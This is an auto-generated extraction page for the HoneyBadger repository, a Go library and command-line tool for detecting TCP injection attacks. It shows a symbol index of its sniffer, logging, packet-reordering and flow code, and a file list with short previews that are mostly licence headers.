function NewMockSniffer (line 21) | func NewMockSniffer(options *types.SnifferDriverOptions, dispatcher Pack...
type MockConnection (line 42) | type MockConnection struct
method GetClientFlow (line 52) | func (m MockConnection) GetClientFlow() *types.TcpIpFlow {
method Close (line 56) | func (m MockConnection) Close() {
method ReceivePacket (line 61) | func (m MockConnection) ReceivePacket(p *types.PacketManifest) {
method GetLastSeen (line 65) | func (m MockConnection) GetLastSeen() time.Time {
method SetPacketLogger (line 69) | func (m MockConnection) SetPacketLogger(l types.PacketLogger) {
type mockConnFactory (line 73) | type mockConnFactory struct
method Build (line 76) | func (m *mockConnFactory) Build(options ConnectionOptions) ConnectionI...
type MockPacketLoggerFactory (line 85) | type MockPacketLoggerFactory struct
method Build (line 90) | func (f MockPacketLoggerFactory) Build(flow *types.TcpIpFlow) types.Pa...
type MockPacketLogger (line 94) | type MockPacketLogger struct
method WritePacket (line 105) | func (m *MockPacketLogger) WritePacket(rawPacket []byte, timestamp tim...
method SetFileWriter (line 110) | func (m *MockPacketLogger) SetFileWriter(writer io.WriteCloser) {
method Start (line 113) | func (m *MockPacketLogger) Start() {
method Stop (line 117) | func (m *MockPacketLogger) Stop() {
method Archive (line 121) | func (m *MockPacketLogger) Archive() {
method Remove (line 124) | func (m *MockPacketLogger) Remove() {
function NewMockPacketLogger (line 98) | func NewMockPacketLogger(str string, flow *types.TcpIpFlow, pcapNum int,...
function SetupTestInquisitor (line 127) | func SetupTestInquisitor() (*Supervisor, PacketDispatcher, types.PacketS...
function TestInquisitorForceQuit (line 170) | func TestInquisitorForceQuit(t *testing.T) {
function TestInquisitorSourceStopped (line 176) | func TestInquisitorSourceStopped(t *testing.T) {
function TestInquisitorSourceReceiveOne (line 182) | func TestInquisitorSourceReceiveOne(t *testing.T) {
function TestInquisitorResetTwice (line 231) | func TestInquisitorResetTwice(t *testing.T) {
function SetupRealConnectionInquisitor (line 302) | func SetupRealConnectionInquisitor() (*Supervisor, PacketDispatcher, typ...
FILE: drivers/afpacket.go
function init (line 31) | func init() {
type AfpacketHandle (line 35) | type AfpacketHandle struct
method ReadPacketData (line 46) | func (a *AfpacketHandle) ReadPacketData() (data []byte, ci gopacket.Ca...
method Close (line 50) | func (a *AfpacketHandle) Close() error {
function NewAfpacketHandle (line 39) | func NewAfpacketHandle(options *types.SnifferDriverOptions) (types.Packe...
FILE: drivers/bpf.go
function init (line 31) | func init() {
type BPFHandle (line 35) | type BPFHandle struct
method ReadPacketData (line 47) | func (a *BPFHandle) ReadPacketData() (data []byte, ci gopacket.Capture...
method Close (line 51) | func (a *BPFHandle) Close() error {
function NewBPFHandle (line 39) | func NewBPFHandle(options *types.SnifferDriverOptions) (types.PacketData...
FILE: drivers/libpcap.go
function init (line 32) | func init() {
type PcapHandle (line 36) | type PcapHandle struct
method ReadPacketData (line 74) | func (p *PcapHandle) ReadPacketData() (data []byte, ci gopacket.Captur...
method Close (line 78) | func (p *PcapHandle) Close() error {
function NewPcapSniffer (line 40) | func NewPcapSniffer(options *types.SnifferDriverOptions) (types.PacketDa...
function NewPcapFileSniffer (line 57) | func NewPcapFileSniffer(filename string) (*PcapHandle, error) {
function NewPcapWireSniffer (line 65) | func NewPcapWireSniffer(netDevice string, snaplen int32, wireDuration ti...
FILE: drivers/pcapgo.go
function init (line 34) | func init() {
type PcapgoHandle (line 38) | type PcapgoHandle struct
method ReadPacketData (line 59) | func (a *PcapgoHandle) ReadPacketData() ([]byte, gopacket.CaptureInfo,...
method Close (line 64) | func (a *PcapgoHandle) Close() error {
function NewPcapgoHandle (line 43) | func NewPcapgoHandle(options *types.SnifferDriverOptions) (types.PacketD...
FILE: drivers/register.go
function SnifferRegister (line 30) | func SnifferRegister(name string, packetDataSourceCloserFactory func(*ty...
FILE: logging/attack_logger.go
type SerializedEvent (line 33) | type SerializedEvent struct
type AttackJsonLogger (line 47) | type AttackJsonLogger struct
method Start (line 64) | func (a *AttackJsonLogger) Start() {
method Stop (line 68) | func (a *AttackJsonLogger) Stop() {
method receiveReports (line 72) | func (a *AttackJsonLogger) receiveReports() {
method Log (line 83) | func (a *AttackJsonLogger) Log(event *types.Event) {
method SerializeAndWrite (line 87) | func (a *AttackJsonLogger) SerializeAndWrite(event *types.Event) {
method Publish (line 106) | func (a *AttackJsonLogger) Publish(event *SerializedEvent) {
function NewAttackJsonLogger (line 55) | func NewAttackJsonLogger(archiveDir string) *AttackJsonLogger {
FILE: logging/metadata_attack_logger.go
type AttackMetadataJsonLogger (line 33) | type AttackMetadataJsonLogger struct
method Start (line 50) | func (a *AttackMetadataJsonLogger) Start() {
method Stop (line 54) | func (a *AttackMetadataJsonLogger) Stop() {
method receiveReports (line 58) | func (a *AttackMetadataJsonLogger) receiveReports() {
method Log (line 69) | func (a *AttackMetadataJsonLogger) Log(event *types.Event) {
method SerializeAndWrite (line 73) | func (a *AttackMetadataJsonLogger) SerializeAndWrite(event *types.Even...
method Publish (line 89) | func (a *AttackMetadataJsonLogger) Publish(event *SerializedEvent) {
function NewAttackMetadataJsonLogger (line 41) | func NewAttackMetadataJsonLogger(archiveDir string) *AttackMetadataJsonL...
FILE: logging/pcap_logger.go
type TimedPacket (line 36) | type TimedPacket struct
type PcapLogger (line 42) | type PcapLogger struct
method SetFileWriter (line 95) | func (p *PcapLogger) SetFileWriter(writer io.WriteCloser) {
method WriteHeader (line 100) | func (p *PcapLogger) WriteHeader() {
method Start (line 107) | func (p *PcapLogger) Start() {
method Stop (line 111) | func (p *PcapLogger) Stop() {
method Archive (line 116) | func (p *PcapLogger) Archive() {
method logPackets (line 124) | func (p *PcapLogger) logPackets() {
method Remove (line 139) | func (p *PcapLogger) Remove() {
method WritePacket (line 146) | func (p *PcapLogger) WritePacket(rawPacket []byte, timestamp time.Time) {
method WritePacketToFile (line 153) | func (p *PcapLogger) WritePacketToFile(rawPacket []byte, timestamp tim...
function NewPcapLogger (line 56) | func NewPcapLogger(logDir, archiveDir string, flow *types.TcpIpFlow, pca...
type PcapLoggerFactory (line 75) | type PcapLoggerFactory struct
method Build (line 91) | func (f PcapLoggerFactory) Build(flow *types.TcpIpFlow) types.PacketLo...
function NewPcapLoggerFactory (line 82) | func NewPcapLoggerFactory(logDir, archiveDir string, pcapLogNum, pcapQuo...
FILE: logging/pcap_logger_test.go
function makeTestPacket (line 15) | func makeTestPacket() []byte {
type TestPcapWriter (line 46) | type TestPcapWriter struct
method Write (line 54) | func (w *TestPcapWriter) Write(data []byte) (int, error) {
method Close (line 59) | func (w *TestPcapWriter) Close() error {
function NewTestPcapWriter (line 50) | func NewTestPcapWriter() *TestPcapWriter {
function TestPcapLogger (line 63) | func TestPcapLogger(t *testing.T) {
FILE: logging/rotating_writer.go
type RotatingQuotaWriter (line 28) | type RotatingQuotaWriter struct
method Write (line 61) | func (w *RotatingQuotaWriter) Write(output []byte) (int, error) {
method Close (line 96) | func (w *RotatingQuotaWriter) Close() error {
method rotate (line 102) | func (w *RotatingQuotaWriter) rotate() {
method shiftLog (line 121) | func (w *RotatingQuotaWriter) shiftLog(logNum int) {
function NewRotatingQuotaWriter (line 42) | func NewRotatingQuotaWriter(filename string, quotaSize int, numLogs int,...
FILE: logging/util_test.go
type TestSignalWriter (line 3) | type TestSignalWriter struct
method Write (line 16) | func (w *TestSignalWriter) Write(data []byte) (int, error) {
method Close (line 22) | func (w *TestSignalWriter) Close() error {
function NewTestSignalWriter (line 9) | func NewTestSignalWriter() *TestSignalWriter {
FILE: ordered_coalesce.go
constant pageBytes (line 24) | pageBytes = 1900
constant memLog (line 26) | memLog = true
type page (line 32) | type page struct
type pageCache (line 41) | type pageCache struct
method grow (line 61) | func (c *pageCache) grow() {
method next (line 75) | func (c *pageCache) next(ts time.Time) (p *page) {
method replace (line 96) | func (c *pageCache) replace(p *page) {
constant initialAllocSize (line 49) | initialAllocSize = 1024
function newPageCache (line 51) | func newPageCache() *pageCache {
function min (line 101) | func min(a, b int) int {
function byteSpan (line 108) | func byteSpan(expected, received types.Sequence, bytes []byte) (toSend [...
type OrderedCoalesce (line 121) | type OrderedCoalesce struct
method Close (line 158) | func (o *OrderedCoalesce) Close() {
method insert (line 164) | func (o *OrderedCoalesce) insert(packetManifest *types.PacketManifest,...
method flushUntilThreshold (line 193) | func (o *OrderedCoalesce) flushUntilThreshold(nextSeq types.Sequence) ...
method pagesFromTcp (line 212) | func (o *OrderedCoalesce) pagesFromTcp(p *types.PacketManifest) (*page...
method traverse (line 241) | func (o *OrderedCoalesce) traverse(seq types.Sequence) (*page, *page) {
method pushBetween (line 255) | func (o *OrderedCoalesce) pushBetween(prev, next, first, last *page) {
method freeNext (line 271) | func (o *OrderedCoalesce) freeNext() {
method addNext (line 295) | func (o *OrderedCoalesce) addNext(nextSeq types.Sequence) (types.Seque...
method addContiguous (line 368) | func (o *OrderedCoalesce) addContiguous(nextSeq types.Sequence) (types...
function NewOrderedCoalesce (line 143) | func NewOrderedCoalesce(logger types.Logger, flow *types.TcpIpFlow, page...
FILE: ordered_coalesce_test.go
function TestOrderedCoalesceUsedPages (line 12) | func TestOrderedCoalesceUsedPages(t *testing.T) {
FILE: pcap_integration_test.go
type DummyPacketLogger (line 15) | type DummyPacketLogger struct
method WritePacket (line 30) | func (m *DummyPacketLogger) WritePacket(rawPacket []byte, timestamp ti...
method SetFileWriter (line 33) | func (m DummyPacketLogger) SetFileWriter(writer io.WriteCloser) {
method Start (line 36) | func (m DummyPacketLogger) Start() {
method Stop (line 39) | func (m DummyPacketLogger) Stop() {
method Archive (line 42) | func (m DummyPacketLogger) Archive() {
method Remove (line 45) | func (m DummyPacketLogger) Remove() {
function NewDummyPacketLogger (line 18) | func NewDummyPacketLogger(str string, flow *types.TcpIpFlow, pcapNum int...
type DummyPacketLoggerFactory (line 23) | type DummyPacketLoggerFactory struct
method Build (line 26) | func (f DummyPacketLoggerFactory) Build(flow *types.TcpIpFlow) types.P...
type TestLogger (line 48) | type TestLogger struct
method Log (line 57) | func (t *TestLogger) Log(event *types.Event) {
method Archive (line 61) | func (t *TestLogger) Archive() {
function NewTestLogger (line 53) | func NewTestLogger() TestLogger {
function SetupAttackDetectionPcapInquisitor (line 64) | func SetupAttackDetectionPcapInquisitor(pcapPath string, attackLogger *T...
function PcapIsDetectInjection (line 105) | func PcapIsDetectInjection(pcapPath string) bool {
function TestAllPcapFiles (line 115) | func TestAllPcapFiles(t *testing.T) {
FILE: retrospective.go
function checkForInjectionInRing (line 32) | func checkForInjectionInRing(ringPtr *types.Ring, start, end types.Seque...
function getOverlapBytesFromSlice (line 63) | func getOverlapBytesFromSlice(payload []byte, sequence types.Sequence, o...
function getOverlapsInRing (line 69) | func getOverlapsInRing(ringPtr *types.Ring, start, end types.Sequence) [...
FILE: retrospective_test.go
type reassemblyInput (line 14) | type reassemblyInput struct
type TestOverlapBytesWant (line 19) | type TestOverlapBytesWant struct
type DummyAttackLogger (line 25) | type DummyAttackLogger struct
method Log (line 36) | func (d *DummyAttackLogger) Log(event *types.Event) {
method Archive (line 40) | func (d *DummyAttackLogger) Archive() {
function NewDummyAttackLogger (line 29) | func NewDummyAttackLogger() *DummyAttackLogger {
function TestGetOverlapsInRing (line 43) | func TestGetOverlapsInRing(t *testing.T) {
function TestInjectionDetector (line 128) | func TestInjectionDetector(t *testing.T) {
FILE: sniffer.go
type Sniffer (line 35) | type Sniffer struct
method SetSupervisor (line 56) | func (i *Sniffer) SetSupervisor(supervisor types.Supervisor) {
method GetStartedChan (line 60) | func (i *Sniffer) GetStartedChan() chan bool {
method Start (line 65) | func (i *Sniffer) Start() {
method Stop (line 73) | func (i *Sniffer) Stop() {
method Close (line 79) | func (i *Sniffer) Close() {
method setupHandle (line 89) | func (i *Sniffer) setupHandle() {
method capturePackets (line 115) | func (i *Sniffer) capturePackets() {
method decodePackets (line 142) | func (i *Sniffer) decodePackets() {
function NewSniffer (line 46) | func NewSniffer(options *types.SnifferDriverOptions, dispatcher PacketDi...
FILE: supervisor.go
type SupervisorOptions (line 30) | type SupervisorOptions struct
type Supervisor (line 38) | type Supervisor struct
method GetDispatcher (line 58) | func (b Supervisor) GetDispatcher() PacketDispatcher {
method GetSniffer (line 62) | func (b Supervisor) GetSniffer() types.PacketSource {
method Stopped (line 67) | func (b Supervisor) Stopped() {
method Run (line 72) | func (b Supervisor) Run() {
function NewSupervisor (line 45) | func NewSupervisor(options SupervisorOptions) *Supervisor {
FILE: types/events.go
type Logger (line 27) | type Logger interface
type PacketLogger (line 31) | type PacketLogger interface
type PacketLoggerFactory (line 40) | type PacketLoggerFactory interface
type Event (line 44) | type Event struct
FILE: types/flow.go
type TcpIpFlow (line 32) | type TcpIpFlow struct
method String (line 63) | func (t TcpIpFlow) String() string {
method Reverse (line 70) | func (t *TcpIpFlow) Reverse() TcpIpFlow {
method Equal (line 75) | func (t *TcpIpFlow) Equal(s *TcpIpFlow) bool {
method Flows (line 101) | func (t *TcpIpFlow) Flows() (gopacket.Flow, gopacket.Flow) {
function NewTcpIp4FlowFromLayers (line 38) | func NewTcpIp4FlowFromLayers(ipLayer layers.IPv4, tcpLayer layers.TCP) *...
function NewTcpIp6FlowFromLayers (line 46) | func NewTcpIp6FlowFromLayers(ipLayer layers.IPv6, tcpLayer layers.TCP) *...
function NewTcpIpFlowFromFlows (line 54) | func NewTcpIpFlowFromFlows(netFlow gopacket.Flow, tcpFlow gopacket.Flow)...
function NewTcpIpFlowFromPacket (line 85) | func NewTcpIpFlowFromPacket(packet []byte) (*TcpIpFlow, error) {
type HashedTcpIpv6Flow (line 105) | type HashedTcpIpv6Flow struct
function NewHashedTcpIpv6Flow (line 112) | func NewHashedTcpIpv6Flow(flow *TcpIpFlow) HashedTcpIpv6Flow {
type HashedTcpIpv4Flow (line 137) | type HashedTcpIpv4Flow struct
function NewHashedTcpIpv4Flow (line 143) | func NewHashedTcpIpv4Flow(flow *TcpIpFlow) HashedTcpIpv4Flow {
FILE: types/flow_test.go
function TestFlows (line 11) | func TestFlows(t *testing.T) {
function TestFlowString (line 22) | func TestFlowString(t *testing.T) {
function TestFlowEqual (line 32) | func TestFlowEqual(t *testing.T) {
function TestNewTcpIpFlowFromPacket (line 56) | func TestNewTcpIpFlowFromPacket(t *testing.T) {
function FlowFromPacket (line 97) | func FlowFromPacket() *TcpIpFlow {
function TestHashedTcpIpv4Flow (line 124) | func TestHashedTcpIpv4Flow(t *testing.T) {
function TestHashedTcpIpv6Flow (line 135) | func TestHashedTcpIpv6Flow(t *testing.T) {
FILE: types/packet_source.go
type SnifferDriverOptions (line 32) | type SnifferDriverOptions struct
type PacketDataSourceCloser (line 42) | type PacketDataSourceCloser interface
type Supervisor (line 54) | type Supervisor interface
type PacketSource (line 59) | type PacketSource interface
type PacketManifest (line 67) | type PacketManifest struct
method String (line 78) | func (p PacketManifest) String() string {
FILE: types/reassembly.go
type Reassembly (line 20) | type Reassembly struct
method String (line 46) | func (r Reassembly) String() string {
FILE: types/ring.go
type Ring (line 17) | type Ring struct
method init (line 22) | func (r *Ring) init() *Ring {
method Next (line 29) | func (r *Ring) Next() *Ring {
method Prev (line 34) | func (r *Ring) Prev() *Ring {
method Len (line 56) | func (r *Ring) Len() int {
method Count (line 68) | func (r *Ring) Count() int {
function NewRing (line 39) | func NewRing(n int) *Ring {
FILE: types/sequence.go
constant InvalidSequence (line 14) | InvalidSequence Sequence = Sequence(-1)
constant uint32Max (line 15) | uint32Max = 0xFFFFFFFF
type Sequence (line 22) | type Sequence
method Difference (line 35) | func (s Sequence) Difference(t Sequence) int {
method LessThan (line 45) | func (s Sequence) LessThan(t Sequence) bool {
method LessThanOrEqual (line 50) | func (s Sequence) LessThanOrEqual(t Sequence) bool {
method Equals (line 55) | func (s Sequence) Equals(t Sequence) bool {
method GreaterThan (line 60) | func (s Sequence) GreaterThan(t Sequence) bool {
method GreaterThanOrEqual (line 65) | func (s Sequence) GreaterThanOrEqual(t Sequence) bool {
method Add (line 70) | func (s Sequence) Add(t int) Sequence {
Condensed preview — 46 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (244K chars).
[
{
"path": ".travis.yml",
"chars": 318,
"preview": "\n\nlanguage: go\n\ngo:\n - \"1.13\"\n\nbefore_install:\n - sudo apt-get update -qq\n - sudo apt-get install -y libpcap-dev\n - git"
},
{
"path": "LICENSE",
"chars": 35147,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free "
},
{
"path": "LICENSE_BSD",
"chars": 1555,
"preview": "Copyright (c) 2012 Google, Inc. All rights reserved.\nCopyright (c) 2009-2011 Andreas Krennmair. All rights reserved.\n\nRe"
},
{
"path": "README.rst",
"chars": 7924,
"preview": "\n===========\nHoneyBadger\n===========\n\n\n.. image:: http://honeybadger.readthedocs.org/en/latest/_images/honey_badger-whit"
},
{
"path": "attack/injector.go",
"chars": 4201,
"preview": "/*\n * injector.go - TCP stream injector API - \"integration tests\" for HoneyBadger\n * Copyright (C) 2014, 2015 Dav"
},
{
"path": "blocks/LICENSE",
"chars": 18047,
"preview": " GNU GENERAL PUBLIC LICENSE\n Version 2, June 1991\n\n Copyright (C) 1989, 1991 Fr"
},
{
"path": "blocks/blocks.go",
"chars": 2680,
"preview": "// code borrowed from https://github.com/zond/qisniff\n// it's GPL2 see LICENSE\n\n// modified to use our Sequence type ins"
},
{
"path": "blocks/blocks_test.go",
"chars": 2430,
"preview": "package blocks\n\nimport \"testing\"\nimport \"github.com/david415/HoneyBadger/types\"\n\n\nfunc checkBlocks(t *testing.T, got, wa"
},
{
"path": "cmd/handshakeHijacker/main.go",
"chars": 4677,
"preview": "/*\n * TCP handshake hijack implementation\n * Copyright (C) 2014, 2015 David Stainton\n *\n * This program is fre"
},
{
"path": "cmd/honeyBadger/main.go",
"chars": 6663,
"preview": "/*\n * HoneyBadger main command line tool\n *\n * Copyright (C) 2014, 2015 David Stainton\n *\n * This program is f"
},
{
"path": "cmd/honeybadgerReportTool/main.go",
"chars": 2634,
"preview": "/*\n * HoneyBadger report deserialization tool\n *\n * Copyright (C) 2015 David Stainton\n *\n * This program is fr"
},
{
"path": "cmd/honeybadgerReportTool/tcp_port_distribution.py",
"chars": 1802,
"preview": "#!/usr/bin/python\n\nimport re\nimport sys\nimport os\nimport argparse\n\ndef count_distribution(filename, or_addr):\n port_m"
},
{
"path": "cmd/honeybadgerReportToolColor/main.go",
"chars": 2666,
"preview": "/*\n * HoneyBadger report deserialization tool\n *\n * Copyright (C) 2015 David Stainton\n *\n * This program is fr"
},
{
"path": "cmd/sprayInjector/main.go",
"chars": 5842,
"preview": "/*\n * rough but working prototype; probabalistic ordered coalesce TCP stream injector!\n *\n * Copyright (C) 2014, 2"
},
{
"path": "cmd/testBpfSniffer/README",
"chars": 1110,
"preview": "// this was briefly useful for debuging the gopacket bsdbpf packet capture api\n// as i was developing it\npackage main\n"
},
{
"path": "connection.go",
"chars": 20992,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "connection_test.go",
"chars": 11963,
"preview": "package HoneyBadger\n\nimport (\n\t\"log\"\n\t\"net\"\n\t\"testing\"\n\t\"time\"\n\n\t\"github.com/david415/HoneyBadger/types\"\n\t\"github.com/go"
},
{
"path": "dispatcher.go",
"chars": 7994,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "dispatcher_test.go",
"chars": 8500,
"preview": "package HoneyBadger\n\nimport (\n\t\"io\"\n\t\"log\"\n\t\"net\"\n\t\"os\"\n\t\"testing\"\n\t\"time\"\n\n\t\"github.com/david415/HoneyBadger/logging\"\n\t"
},
{
"path": "drivers/afpacket.go",
"chars": 1566,
"preview": "// +build linux\n\n/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015"
},
{
"path": "drivers/bpf.go",
"chars": 1555,
"preview": "// +build darwin dragonfly freebsd netbsd openbsd\n\n/*\n * HoneyBadger core library for detecting TCP injection attacks"
},
{
"path": "drivers/libpcap.go",
"chars": 2344,
"preview": "// +build linux freebsd solaris\n\n/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyrigh"
},
{
"path": "drivers/pcapgo.go",
"chars": 1660,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "drivers/register.go",
"chars": 1532,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "go.mod",
"chars": 226,
"preview": "module github.com/david415/HoneyBadger\n\ngo 1.13\n\nrequire (\n\tgithub.com/fatih/color v1.7.0\n\tgithub.com/google/gopacket v1"
},
{
"path": "go.sum",
"chars": 1800,
"preview": "github.com/fatih/color v1.7.0 h1:DkWD4oS2D8LGGgTQ6IvwJJXSL5Vp2ffcQg58nFV38Ys=\ngithub.com/fatih/color v1.7.0/go.mod h1:Zm"
},
{
"path": "logging/attack_logger.go",
"chars": 3363,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "logging/metadata_attack_logger.go",
"chars": 2938,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "logging/pcap_logger.go",
"chars": 4059,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "logging/pcap_logger_test.go",
"chars": 2553,
"preview": "package logging\n\nimport (\n\t\"bytes\"\n\t\"github.com/david415/HoneyBadger/types\"\n\t\"github.com/google/gopacket\"\n\t\"github.com/g"
},
{
"path": "logging/rotating_writer.go",
"chars": 3464,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2015 David Stainton\n *\n * "
},
{
"path": "logging/util_test.go",
"chars": 463,
"preview": "package logging\n\ntype TestSignalWriter struct {\n\tlastWrite []byte\n\tsignalChan chan bool\n\tcloseChan chan bool\n}\n\nfunc N"
},
{
"path": "ordered_coalesce.go",
"chars": 10930,
"preview": "/*\n * packet_reorder.go - tcp packet reordering\n *\n * I include google's license because this code is copy-pasted "
},
{
"path": "ordered_coalesce_test.go",
"chars": 1420,
"preview": "package HoneyBadger\n\nimport (\n\t\"github.com/david415/HoneyBadger/types\"\n\t\"github.com/google/gopacket\"\n\t\"github.com/google"
},
{
"path": "pcap_integration_test.go",
"chars": 3147,
"preview": "package HoneyBadger\n\nimport (\n\t\"fmt\"\n\t\"io\"\n\t\"os\"\n\t\"path/filepath\"\n\t\"strings\"\n\t\"testing\"\n\t\"time\"\n\n\t\"github.com/david415/H"
},
{
"path": "retrospective.go",
"chars": 3284,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "retrospective_test.go",
"chars": 6185,
"preview": "package HoneyBadger\n\nimport (\n\t\"log\"\n\t\"net\"\n\t\"testing\"\n\n\t\"github.com/david415/HoneyBadger/blocks\"\n\t\"github.com/david415/"
},
{
"path": "sniffer.go",
"chars": 5424,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014 David Stainton\n *\n * "
},
{
"path": "supervisor.go",
"chars": 2602,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "types/events.go",
"chars": 1411,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "types/flow.go",
"chars": 4897,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "types/flow_test.go",
"chars": 4620,
"preview": "package types\n\nimport (\n\t\"github.com/google/gopacket\"\n\t\"github.com/google/gopacket/layers\"\n\t\"net\"\n\t\"strings\"\n\t\"testing\"\n"
},
{
"path": "types/packet_source.go",
"chars": 2456,
"preview": "/*\n * HoneyBadger core library for detecting TCP injection attacks\n *\n * Copyright (C) 2014, 2015 David Stainton\n"
},
{
"path": "types/reassembly.go",
"chars": 1760,
"preview": "/*\n * I include google's license because this code is copy-pasted and refactored\n * from the original, Google's go"
},
{
"path": "types/ring.go",
"chars": 1740,
"preview": "// Modified from Google's original container ring;\n// Here the goal is to use the ring with our Reassembly type\n// and r"
},
{
"path": "types/sequence.go",
"chars": 2167,
"preview": "/* sequence.go - this here file is composed of source code directly from gopacket.tcpassembly...\n included here for us"
}
]
About this extraction
This page contains the full source code of the david415/HoneyBadger GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 46 files (221.4 KB), approximately 62.9k tokens, and a symbol index with 316 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.